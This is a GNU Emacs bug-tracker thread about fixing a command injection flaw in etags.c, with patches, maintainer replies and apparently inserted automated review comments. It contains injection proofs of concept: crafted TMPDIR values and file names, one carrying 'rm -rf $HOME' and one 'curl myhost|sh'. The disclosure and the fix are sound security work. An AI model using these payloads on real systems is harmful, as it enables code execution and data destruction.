From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 08:51:36 2022
Date: Sun, 4 Dec 2022 21:51:13 +0800
From: lux
To: bug-gnu-emacs@gnu.org
Subject: [PATCH] Fix etags local command injection vulnerability
X-OQ-MSGID: <20221204215113.6f003c5f@lx-pc>
X-Mailer: Claws Mail 4.1.1 (GTK 3.24.35; x86_64-redhat-linux-gnu)

Hi, this patch fixes a new local command injection vulnerability in
etags.c.

This vulnerability occurs in the following code:

#if MSDOS || defined (DOS_NT)
      char *cmd1 = concat (compr->command, " \"", real_name);
      char *cmd = concat (cmd1, "\" > ", tmp_name);
#else
      char *cmd1 = concat (compr->command, " '", real_name);
      char *cmd = concat (cmd1, "' > ", tmp_name);
#endif
      free (cmd1);
      inf = (system (cmd) == -1
             ? NULL
             : fopen (tmp_name, "r" FOPEN_BINARY));
      free (cmd);
    }

Vulnerability #1:

The tmp_name variable gets its value from the etags_mktmp() function;
this function takes the value from the environment variable `TMPDIR`,
`TEMP` or `TMP`, but without checking the value.  So, if a hacker can
control these environment variables, they can execute shell code.
Attack example: $ ls etags.c $ zip etags.z etags.c adding: etags.c (deflated 72%) $ tmpdir="/tmp/;uname -a;/" $ mkdir $tmpdir $ TMPDIR=$tmpdir etags * sh: line 1: /tmp/: Is a directory Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux sh: line 1: /etECggCJ: No such file or directory etags: skipping inclusion of TAGS in self. Vulnerability #2: If the target file is a compressed file, execute system commands (such as gzip, etc.), but do not check the file name. Attack example: $ ls etags.c $ zip "';uname -a;'test.z" etags.c <--- inject the shell code to filename adding: etags.c (deflated 72%) $ etags * gzip: .gz: No such file or directory Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux sh: line 1: test.z: command not found I fix this vulnerability. By create a process, instead of call the sh or cmd.exe, and this patch work the Linux, BSD and Windows. --MP_/nUhn8RG=Y4UPID575FtLTji Content-Type: text/x-patch Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=0001-Fix-etags-local-command-injection-vulnerability.patch >From 30cec9dcbd67998ce2360d191044e8d97992f794 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Sun, 4 Dec 2022 21:18:29 +0800 Subject: [PATCH] Fix etags local command injection vulnerability * lib-src/etags.c: (decompress_file): New function --- lib-src/etags.c | 155 +++++++++++++++++++++++++++++++++++++----------- 1 file changed, 121 insertions(+), 34 deletions(-) diff --git a/lib-src/etags.c b/lib-src/etags.c index d1d20858cd..7c5faf8d6b 100644 --- a/lib-src/etags.c +++ b/lib-src/etags.c @@ -97,6 +97,7 @@ Copyright (C) 1984, 1987-1989, 1993-1995, 1998-2022 Free Software #ifdef WINDOWSNT # include +# include # undef HAVE_NTGUI # undef DOS_NT # define DOS_NT 
@@ -124,6 +125,7 @@ Copyright (C) 1984, 1987-1989, 1993-1995, 1998-2022 Free Software #include #include #include +#include /* Define CTAGS to make the program "ctags" compatible with the usual one. Leave it undefined to make the program "etags", which makes emacs-style @@ -255,7 +257,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) typedef struct { const char *suffix; /* file name suffix for this compressor */ - const char *command; /* takes one arg and decompresses to stdout */ + const char *command; /* uncompress command */ } compressor; typedef struct @@ -391,6 +393,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static _Noreturn void pfatal (const char *); static void add_node (node *, node **); +static bool decompress_file (const char *, const char *, const char *); static void process_file_name (char *, language *); static void process_file (FILE *, char *, language *); static void find_entries (FILE *); @@ -527,16 +530,16 @@ #define STDIN 0x1001 /* returned by getopt_long on --parse-stdin */ }; static compressor compressors[] = -{ - { "z", "gzip -d -c"}, - { "Z", "gzip -d -c"}, - { "gz", "gzip -d -c"}, - { "GZ", "gzip -d -c"}, - { "bz2", "bzip2 -d -c" }, - { "xz", "xz -d -c" }, - { "zst", "zstd -d -c" }, - { NULL } -}; + { + { "z", "gzip" }, + { "Z", "gzip" }, + { "gz", "gzip" }, + { "GZ", "gzip" }, + { "bz2", "bzip2" }, + { "xz", "xz" }, + { "zst", "zstd" }, + { NULL } + }; /* * Language stuff. @@ -1621,7 +1624,6 @@ process_file_name (char *file, language *lang) compressor *compr; char *compressed_name, *uncompressed_name; char *ext, *real_name UNINIT, *tmp_name UNINIT; - int retval; canonicalize_filename (file); if (streq (file, tagfile) && !streq (tagfile, "-")) 
@@ -1712,37 +1714,29 @@ process_file_name (char *file, language *lang) inf = NULL; else { -#if MSDOS || defined (DOS_NT) - char *cmd1 = concat (compr->command, " \"", real_name); - char *cmd = concat (cmd1, "\" > ", tmp_name); -#else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); -#endif - free (cmd1); - inf = (system (cmd) == -1 - ? NULL - : fopen (tmp_name, "r" FOPEN_BINARY)); - free (cmd); - } - - if (!inf) - { - perror (real_name); - goto cleanup; + inf = (!decompress_file (compr->command, real_name, tmp_name) + ? NULL + : fopen (tmp_name, "r" FOPEN_BINARY)); + if (!inf) + { + perror (real_name); + goto cleanup; + } } } process_file (inf, uncompressed_name, lang); - retval = fclose (inf); + if (fclose (inf) < 0) + pfatal (file); + if (real_name == compressed_name) { - remove (tmp_name); + if (remove (tmp_name) == -1) + pfatal (tmp_name); + free (tmp_name); } - if (retval < 0) - pfatal (file); cleanup: if (compressed_name != file) 
@@ -1754,6 +1748,99 @@ process_file_name (char *file, language *lang) return; } +/* + * Specify a decompression command and write the decompression content to a new file. + * On success, true is returned. + */ +static bool +decompress_file (const char *command, const char *input_file, const char *output_file) +{ +#ifdef DOS_NT + SECURITY_ATTRIBUTES sa; + sa.nLength = sizeof (SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = true; + + HANDLE hFile = CreateFile (output_file, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + + if (hFile == INVALID_HANDLE_VALUE) + { + perror (output_file); + return false; + } + + PROCESS_INFORMATION pi; + STARTUPINFO si; + ZeroMemory (&si, sizeof (si)); + ZeroMemory (&pi, sizeof (pi)); + si.cb = sizeof (STARTUPINFO); + si.dwFlags = STARTF_USESTDHANDLES; + si.hStdInput = NULL; + si.hStdOutput = hFile; + si.wShowWindow = SW_HIDE; + + char *cmd = concat (command, " -d -c ", input_file); + if (!CreateProcess (NULL, cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) + { + perror ("CreateProcess error"); + return false; + } + + WaitForSingleObject(pi.hProcess, INFINITE); + + CloseHandle (pi.hProcess); + CloseHandle (pi.hThread); + CloseHandle (hFile); + return true; +#else + int out_f; + if ((out_f = open (output_file, O_CREAT | O_WRONLY)) == -1) + { + perror (output_file); + return false; + } + + pid_t pid = fork (); + if (pid == -1) + { + perror ("fork"); + return false; + } + + if (pid == 0) + { + if (dup2 (out_f, STDOUT_FILENO) == -1) + { + perror ("dup2 stdout error"); + exit (EXIT_FAILURE); + } + + char *command_args[] = { (char *) command, (char *) "-d", (char *) "-c", (char *) input_file, NULL }; + if (execvp (command, command_args) == -1) + { + perror ("cannot execute the decompress command"); + exit (EXIT_FAILURE); + } + + exit (EXIT_SUCCESS); + } + + if (waitpid (pid, NULL, 0) == -1) + { + perror ("waitpid error"); + return false; + } + 
+ if (close (out_f) == -1) + { + perror ("close error"); + return false; + } + + return true; +#endif +} + static void process_file (FILE *fh, char *fn, language *lang) { -- 2.38.1 --MP_/nUhn8RG=Y4UPID575FtLTji-- From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 09:39:39 2022 Received: (at 59817) by debbugs.gnu.org; 4 Dec 2022 14:39:39 +0000 Received: from localhost ([127.0.0.1]:58052 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1q9a-0000QL-RM for submit@debbugs.gnu.org; Sun, 04 Dec 2022 09:39:39 -0500 Received: from eggs.gnu.org ([209.51.188.92]:48484) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1q9Z-0000QE-9O for 59817@debbugs.gnu.org; Sun, 04 Dec 2022 09:39:37 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1q9S-00053Z-Vj; Sun, 04 Dec 2022 09:39:30 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=LkaxDOR2sEP3yuMAEC0+1WXGDStWzsL0+fyDqeX1mUw=; b=W/xz8HVhSLIH eychm2G12qG3r5nTSp9B9VjSIWX5DwZarpFgbjs4rb2dzOTgw6k7b+bWTEc1lwvLIh8mD0lRlljga 2GA5DNaKteACd2S9aBsc6E6NIL3a5mHEc00GBhIdKyt3SnVAL7dM0wQb5Zr7GVlz698oQJ2kPd++F SYfl96nsYL6TEm9KeDm5l3LK7ObCumEX0hvX61eIJHc+oso8jMTIbK16w3vSuNdNQSx82XeVtg6J4 bzizfnGrc7IYaa1BvBlMls33eBuUQCG2zdKSwVsVZh0w1mH88k8oMZ7J91MmcjrCEbc/GlV7JygId zJv7IKBygBf+opvFyBKtDw==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1q9S-0005th-8q; Sun, 04 Dec 2022 09:39:30 -0500 Date: Sun, 04 Dec 2022 16:39:10 +0200 Message-Id: <83r0xf9qsx.fsf@gnu.org> 
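Review bot: in the `@@ -527,16 +530,16 @@` hunk, dropping `-d -c` from every `compressors[]` entry silently changes what the `command` field means, yet the struct comment is only reworded to `/* uncompress command */`; since decompress_file() now appends the fixed `-d -c <file>` arguments itself, say so there (for example `/* program name, run as: command -d -c FILE */`) so the next person adding a compressor knows the flags are not theirs to set. The re-indentation of the whole initializer is unrelated churn that inflates a security diff; keep the original brace placement.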
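Review bot: in the `@@ -1712,37 +1714,29 @@` hunk, the `if (!inf) { perror (real_name); goto cleanup; }` check is moved inside the `else` branch, so the `inf = NULL;` assigned in the `if` arm just above it (the first context line of the hunk) no longer reaches that check and falls straight into `process_file (inf, uncompressed_name, lang)` with a NULL stream. Keep the NULL check after the whole if/else as it was. Separately, `if (remove (tmp_name) == -1) pfatal (tmp_name);` turns a previously ignored cleanup failure into a fatal exit, which is a behaviour change the commit message should mention.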
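Review bot: in the `@@ -1754,6 +1748,99 @@` hunk, `open (output_file, O_CREAT | O_WRONLY)` passes no mode argument with O_CREAT, so the new file's permission bits are undefined, and without O_TRUNC an existing longer file keeps stale trailing data; use `open (output_file, O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0600)`. `waitpid (pid, NULL, 0)` discards the child's status, so a missing or failing decompressor (the child's `exit (EXIT_FAILURE)` after execvp, or a corrupt archive) still returns true and etags then tags an empty or truncated file; pass an `int status` and require `WIFEXITED (status) && WEXITSTATUS (status) == 0`. In the child use `_exit` rather than `exit` so the parent's stdio buffers are not flushed twice, and the trailing `exit (EXIT_SUCCESS)` is unreachable because execvp only returns on failure; out_f also leaks on the fork failure path. `#ifdef DOS_NT` narrows the original `#if MSDOS || defined (DOS_NT)`, so an MSDOS build would now compile the fork/execvp branch. On the Windows side, `hFile` and `cmd` leak when CreateProcess fails, the exit code is never read with GetExitCodeProcess, `si.hStdError` is left NULL although STARTF_USESTDHANDLES is set, `perror` does not report Win32 errors (use GetLastError), and `input_file` is still concatenated unquoted into the command line, so a name containing spaces or quotes is split by the child's argument parsing.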
From: Eli Zaretskii
To: lux
Cc: 59817@debbugs.gnu.org
In-Reply-To: (message from lux on Sun, 4 Dec 2022 21:51:13 +0800)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability

> Date: Sun, 4 Dec 2022 21:51:13 +0800
> From: lux
>
> Hi, this patch fix a new local command injection vulnerability in the
> etags.c.
>
> This vulnerability occurs in the following code:
>
> #if MSDOS || defined (DOS_NT)
>       char *cmd1 = concat (compr->command, " \"", real_name);
>       char *cmd = concat (cmd1, "\" > ", tmp_name);
> #else
>       char *cmd1 = concat (compr->command, " '", real_name);
>       char *cmd = concat (cmd1, "' > ", tmp_name);
> #endif
>       free (cmd1);
>       inf = (system (cmd) == -1
>              ? NULL
>              : fopen (tmp_name, "r" FOPEN_BINARY));
>       free (cmd);
>     }
>
> Vulnerability #1:
>
> for tmp_name variable, the value from the etags_mktmp() function, this
> function takes the value from the environment variable `TMPDIR`, `TEMP`
> or `TMP`, but without checking the value. So, if then hacker can
> control these environment variables, can execute the shell code.
>
> Attack example:
>
> $ ls
> etags.c
> $ zip etags.z etags.c
>   adding: etags.c (deflated 72%)
> $ tmpdir="/tmp/;uname -a;/"
> $ mkdir $tmpdir
> $ TMPDIR=$tmpdir etags *
> sh: line 1: /tmp/: Is a directory
> Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
> sh: line 1: /etECggCJ: No such file or directory
> etags: skipping inclusion of TAGS in self.
>
> Vulnerability #2:
>
> If the target file is a compressed file, execute system commands (such
> as gzip, etc.), but do not check the file name.
>
> Attack example:
>
> $ ls
> etags.c
> $ zip "';uname -a;'test.z" etags.c  <--- inject the shell code to filename
>   adding: etags.c (deflated 72%)
> $ etags *
> gzip: .gz: No such file or directory
> Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
> sh: line 1: test.z: command not found
>
> I fix this vulnerability. By create a process, instead of call the
> sh or cmd.exe, and this patch work the Linux, BSD and Windows.

Thanks, but no, thanks.  This cure is worse than the disease.  Let's please
find simpler, more robust solutions.  If TMPDIR is a problem, let's use a
file whose name is hard-coded in the etags.c source, or quote the name when
we pass it to the shell.  If we suspect someone could disguise shell
commands as file names, let's quote the file names we pass to the shell with
'...' to prevent that.  Etc. etc. -- let's use simple solutions that don't
drastically change the code.

Please understand: etags is a stable program.  I'm not interested in
changes that modify its design or implementation in such drastic ways.

From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 11:27:17 2022
From: Stefan Kangas
To: Eli Zaretskii, lux
Cc: 59817@debbugs.gnu.org
Date: Sun, 4 Dec 2022 08:27:14 -0800
In-Reply-To: <83r0xf9qsx.fsf@gnu.org>
References: <83r0xf9qsx.fsf@gnu.org>
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability

Eli Zaretskii writes:

> Thanks, but no, thanks.  This cure is worse than the disease.  Let's please
> find simpler, more robust solutions.  If TMPDIR is a problem, let's use a
> file whose name is hard-coded in the etags.c source, or quote the name when
> we pass it to the shell.  If we suspect someone could disguise shell
> commands as file names, let's quote the file names we pass to the shell with
> '...' to prevent that.  Etc. etc. -- let's use simple solutions that don't
> drastically change the code.

With single quotes, every single quote character also needs to be quoted
so you can't just use a file named "';rm -rf $HOME;'".  So you need to
substitute every single quote character with something like

    ' => '"'"'

I'm not sure if tricks to escape it will remain, but "man sh" promises:

    Single Quotes
        Enclosing characters in single quotes preserves the literal
        meaning of all the characters (except single quotes, making it
        impossible to put single-quotes in a single-quoted string).

The safest option is to just not call system, of course.
From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 12:04:44 2022
Date: Sun, 04 Dec 2022 19:04:15 +0200
Message-Id: <83lenn9k34.fsf@gnu.org>
From: Eli Zaretskii
To: Stefan Kangas
Cc: lx@shellcodes.org, 59817@debbugs.gnu.org
In-Reply-To: (message from Stefan Kangas on Sun, 4 Dec 2022 08:27:14 -0800)
References: <83r0xf9qsx.fsf@gnu.org>
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
> From: Stefan Kangas
> Date: Sun, 4 Dec 2022 08:27:14 -0800
> Cc: 59817@debbugs.gnu.org
>
> Eli Zaretskii writes:
>
> > Thanks, but no, thanks.  This cure is worse than the disease.  Let's please
> > find simpler, more robust solutions.  If TMPDIR is a problem, let's use a
> > file whose name is hard-coded in the etags.c source, or quote the name when
> > we pass it to the shell.  If we suspect someone could disguise shell
> > commands as file names, let's quote the file names we pass to the shell with
> > '...' to prevent that.  Etc. etc. -- let's use simple solutions that don't
> > drastically change the code.
>
> With single quotes, every single quote character also needs to be quoted
> so you can't just use a file named "';rm -rf $HOME;'".

Yes.  But still, doing so is hardly rocket science, and it leaves the
general design of etags.c intact.

> The safest option is to just not call system, of course.

I'd rather not go there unless it was really necessary.

From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 19:58:27 2022
From: lux
To: Eli Zaretskii
Cc: 59817@debbugs.gnu.org
Date: Mon, 5 Dec 2022 08:58:13 +0800
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
X-Mailer: QQMail 2.x
> Please understand: etags is a stable program.  I'm not interested in
> changes that modify its design or implementation in such drastic ways.

I understand, but not completely agree, stable != security.

Why use the system() function? This is a lazy, insecure little trick,
the exec*(such as execvp) function should be used first. We need
execute a command, but we don't need execute a shell script.

Example a case, In my team, some people like automatically pull new
code from code server, and use etags update tags, so I secretly uploaded
a new file, the file name is:

$ touch "';curl myhost|sh #'a.z"

when he automatically update the tags, I hacking his computer.

So, I have two suggestions:

1. don't use system(), unless know what are doing.

2. escape all dangerous characters, just escaping quotes is not
enough, the following characters can perform additional actions:

"$(ls)"
"`ls`"
"${SHELL}"
"$SHELL"

I'm writing a new patch to escape dangerous characters, and test.

Thanks.

From debbugs-submit-bounces@debbugs.gnu.org Mon Dec 05 07:35:36 2022
Date: Mon, 05 Dec 2022 14:34:58 +0200
Message-Id: <834jua9ggd.fsf@gnu.org>
From: Eli Zaretskii
To: lux
Cc: Stefan Kangas, 59817@debbugs.gnu.org
In-Reply-To: (message from lux on Mon, 5 Dec 2022 08:56:43 +0800)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org>

[Please use Reply All to keep the bug tracker CC'ed.]

> Date: Mon, 5 Dec 2022 08:56:43 +0800
> From: lux
>
> > Please understand: etags is a stable program. I'm not interested in
> > changes that modify its design or implementation in such drastic ways.
>
> I understand, but I do not completely agree: stable != security.

There are ways to plug the security holes in this case without
completely rewriting large parts of the code.

> Why use the system() function? This is a lazy, insecure little trick;
> the exec* functions (such as execvp) should be used first. We need to
> execute a command, but we don't need to execute a shell script.

I think you have a very idealized view of the alternative APIs. They
don't share some disadvantages with 'system', but they have plenty of
their own ones. Especially on non-Posix systems.

> An example case: in my team, some people like to automatically pull new
> code from the code server and use etags to update tags, so I secretly
> uploaded a new file, with the file name:
>
> $ touch "';curl myhost|sh #'a.z"
>
> When he automatically updates the tags, I hack his computer.

Quoting should fix that.

> So, I have two suggestions:
>
> 1. Don't use system(), unless you know what you are doing.

I don't see a reason in this case to rewrite the code not to use 'system'.

> 2. Escape all dangerous characters; just escaping quotes is not
> enough, the following characters can perform additional actions:
>
> "$(ls)"
> "`ls`"
> "${SHELL}"
> "$SHELL"
>
> I'm writing a new patch to escape dangerous characters, and will test it.

There's no reason to try detecting which characters are dangerous and
which aren't. We should instead quote all the file names that come
from outside of the program, so that what's inside the quotes is
interpreted verbatim.
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 02:56:59 2022
Date: Tue, 6 Dec 2022 15:48:10 +0800
From: lux
To: Eli Zaretskii
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
X-OQ-MSGID: <20221206154810.4a8b029c@lx-pc>
In-Reply-To: <834jua9ggd.fsf@gnu.org>
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org>
Cc: Stefan Kangas, 59817@debbugs.gnu.org

On Mon, 05 Dec 2022 14:34:58 +0200 Eli Zaretskii wrote:

> There's no reason to try detecting which characters are dangerous and
> which aren't. We should instead quote all the file names that come
> from outside of the program, so that what's inside the quotes is
> interpreted verbatim.

Thanks, this is the new patch.

Content-Type: text/x-patch
Content-Disposition: attachment; filename=0001-Fix-etags-local-command-injection-vulnerability.patch

>From 3ba143533d74d4caf59a192de6cab4a130140ce7 Mon Sep 17 00:00:00 2001
From: lu4nx
Date: Tue, 6 Dec 2022 15:42:40 +0800
Subject: [PATCH] Fix etags local command injection vulnerability

* lib-src/etags.c: (escape_shell_arg_string): New function.
---
 lib-src/etags.c | 58 +++++++++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 56 insertions(+), 2 deletions(-)

diff --git a/lib-src/etags.c b/lib-src/etags.c
index d1d20858cd..c3ecbc2221 100644
--- a/lib-src/etags.c
+++ b/lib-src/etags.c
@@ -401,6 +401,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static void put_entries (node *); static void cleanup_tags_file (char const * const, char const * const); +static char* escape_shell_arg_string (char *); static void do_move_file (const char *, const char *); static char *concat (const char *, const char *, const char *); static char *skip_spaces (char *); @@ -1716,8 +1717,12 @@ process_file_name (char *file, language *lang) char *cmd1 = concat (compr->command, " \"", real_name); char *cmd = concat (cmd1, "\" > ", tmp_name); #else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); + char *new_real_name = escape_shell_arg_string (real_name); + char *new_tmp_name = escape_shell_arg_string (tmp_name); + char *cmd1 = concat (compr->command, " ", new_real_name); + char *cmd = concat (cmd1, " > ", new_tmp_name); + free (new_real_name); + free (new_tmp_name); #endif free (cmd1); inf = (system (cmd) == -1 
@@ -7707,6 +7712,55 @@ etags_mktmp (void) return templt; } +/* + * Adds single quotes around a string, if found single quotes, escaped it. + * Return a newly-allocated string. + * + * For example: + * escape_shell_arg_string("test.txt") => 'test.txt' + * escape_shell_arg_string("'test.txt") => ''\''test.txt' + */ +static char* +escape_shell_arg_string (char *str) +{ + char *p = str; + int need_space = 2; /* ' at begin and end */ + + while (*p != '\0') + { + if (*p == '\'') + need_space += 4; /* ' to '\'', length is 4 */ + else + need_space++; + + p++; + } + + char *new_str = xnew (need_space + 1, char); + new_str[0] = '\''; + new_str[need_space-1] = '\''; + + int i = 1; /* skip first byte */ + p = str; + while (*p != '\0') + { + new_str[i] = *p; + if (*p == '\'') + { + new_str[i+1] = '\\'; + new_str[i+2] = '\''; + new_str[i+3] = '\''; + i += 3; + } + + i++; + p++; + } + + new_str[need_space] = '\0'; + return new_str; +} + static void do_move_file(const char *src_file, const char *dst_file) { -- 2.38.1
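Review bot: the `#if MSDOS || DOS_NT` branch left above the `#else` in the process_file_name hunk is unchanged, so `char *cmd = concat (cmd1, "\" > ", tmp_name);` still appends `tmp_name` with no quoting at all and wraps `real_name` in nothing more than a pair of double quotes; `tmp_name` is produced by `etags_mktmp`, not by the program's own constants, so that branch needs the same treatment as the POSIX one, at minimum quoting `tmp_name`. In the same hunk, `escape_shell_arg_string` is only ever handed names that it reads, so declaring the parameter `const char *` would document that and avoid forcing non-const pointers on callers.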
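Review bot: the header comment on `escape_shell_arg_string` should say why a `'` becomes the four characters `'\''` (close the single-quoted word, emit an escaped `'`, reopen the word), because inside single quotes a POSIX shell treats backslash literally, so a bare `\'` inside the wrapped word would terminate the quoting early; the present wording ("if found single quotes, escaped it") invites exactly that question. Two smaller points in the function body: `need_space` and `i` are `int` while the buffer is sized by `xnew`, so a very long name wraps the count (`ptrdiff_t` or `size_t` is safer), and `+static char*` should read `static char *` to match the other declarations in the file (`static char *concat`, `static char *skip_spaces`).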
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 07:55:31 2022
Date: Tue, 06 Dec 2022 14:55:09 +0200
Message-Id: <83lenk7kuq.fsf@gnu.org>
From: Eli Zaretskii
To: lux
Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org
In-Reply-To: (message from lux on Tue, 6 Dec 2022 15:48:10 +0800)
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org>

> Date: Tue, 6 Dec 2022 15:48:10 +0800
> From: lux
> Cc: Stefan Kangas, 59817@debbugs.gnu.org
>
> @@ -1716,8 +1717,12 @@ process_file_name (char *file, language *lang)
> char *cmd1 = concat (compr->command, " \"", real_name);
> char *cmd = concat (cmd1, "\" > ", tmp_name);
> #else
> - char *cmd1 = concat (compr->command, " '", real_name);
> - char *cmd = concat (cmd1, "' > ", tmp_name);
> + char *new_real_name = escape_shell_arg_string (real_name);
> + char *new_tmp_name = escape_shell_arg_string (tmp_name);
> + char *cmd1 = concat (compr->command, " ", new_real_name);
> + char *cmd = concat (cmd1, " > ", new_tmp_name);
> + free (new_real_name);
> + free (new_tmp_name);
> #endif

The "MSDOS || DOS_NT" case also needs a small change:

> char *cmd = concat (cmd1, "\" > ", tmp_name);

This doesn't quote tmp_name; it should.

> +static char*
              ^^
There should be a space before "*".

> + if (*p == '\'')
> + {
> + new_str[i+1] = '\\';
> + new_str[i+2] = '\'';
> + new_str[i+3] = '\'';
> + i += 3;

I don't understand why you are adding ''\'' and not just \'.
Wouldn't the latter work for some reason?

Thanks.
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 08:05:28 2022
From: Andreas Schwab
To: lux
Cc: Eli Zaretskii, Stefan Kangas, 59817@debbugs.gnu.org
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org>
Date: Tue, 06 Dec 2022 14:05:16 +0100
In-Reply-To: (lux's message of "Tue, 6 Dec 2022 15:48:10 +0800")

There is a shell_quote function in gnulib.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."
From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 08:11:52 2022
Date: Tue, 6 Dec 2022 21:11:35 +0800
From: lux
To: Eli Zaretskii
Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org
Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability
X-OQ-MSGID: <20221206211135.0c5304a9@lx-pc>
In-Reply-To: <83lenk7kuq.fsf@gnu.org>
References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org>

On Tue, 06 Dec 2022 14:55:09 +0200 Eli Zaretskii wrote:

> The "MSDOS || DOS_NT" case also needs a small change:
>
> > char *cmd = concat (cmd1, "\" > ", tmp_name);
>
> This doesn't quote tmp_name; it should.

Because double quotes have been used here, I have not reproduced this
vulnerability in Windows, so I have not dealt with it:

$ touch "etags.c\" && ipconfig \".z"
$ ./etags.exe "etags.c\" && ipconfig \".z"
etags.c" && ipconfig ".z: Invalid argument
$ ./etags.exe *
etags.exe: skipping inclusion of TAGS in self.
etags.c" && ipconfig ".z: Invalid argument

> > +static char*
>               ^^
> There should be a space before "*".

Done.

> > + if (*p == '\'')
> > + {
> > + new_str[i+1] = '\\';
> > + new_str[i+2] = '\'';
> > + new_str[i+3] = '\'';
> > + i += 3;
>
> I don't understand why you are adding ''\'' and not just \'.
> Wouldn't the latter work for some reason?
>

Because the single quote escape is: '\''

$ echo ''\''hello world'\'''
'hello world'
$ echo 'I'\''m a poor man'
I'm a poor man

Content-Type: text/x-patch
Content-Disposition: attachment; filename=0001-Fix-etags-local-command-injection-vulnerability.patch

>From e182ffe325c882696e20d6e7f8fcbefe82198748 Mon Sep 17 00:00:00 2001
From: lu4nx
Date: Tue, 6 Dec 2022 15:42:40 +0800
Subject: [PATCH] Fix etags local command injection vulnerability

* lib-src/etags.c: (escape_shell_arg_string): New function.
---
 lib-src/etags.c | 58 +++++++++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 56 insertions(+), 2 deletions(-)

diff --git a/lib-src/etags.c b/lib-src/etags.c
index d1d20858cd..519829ec79 100644
--- a/lib-src/etags.c
+++ b/lib-src/etags.c
@@ -401,6 +401,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static void put_entries (node *); static void cleanup_tags_file (char const * const, char const * const); +static char *escape_shell_arg_string (char *); static void do_move_file (const char *, const char *); static char *concat (const char *, const char *, const char *); static char *skip_spaces (char *); @@ -1716,8 +1717,12 @@ process_file_name (char *file, language *lang) char *cmd1 = concat (compr->command, " \"", real_name); char *cmd = concat (cmd1, "\" > ", tmp_name); #else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); + char *new_real_name = escape_shell_arg_string (real_name); + char *new_tmp_name = escape_shell_arg_string (tmp_name); + char *cmd1 = concat (compr->command, " ", new_real_name); + char *cmd = concat (cmd1, " > ", new_tmp_name); + free (new_real_name); + free (new_tmp_name); #endif free (cmd1); inf = (system (cmd) == -1
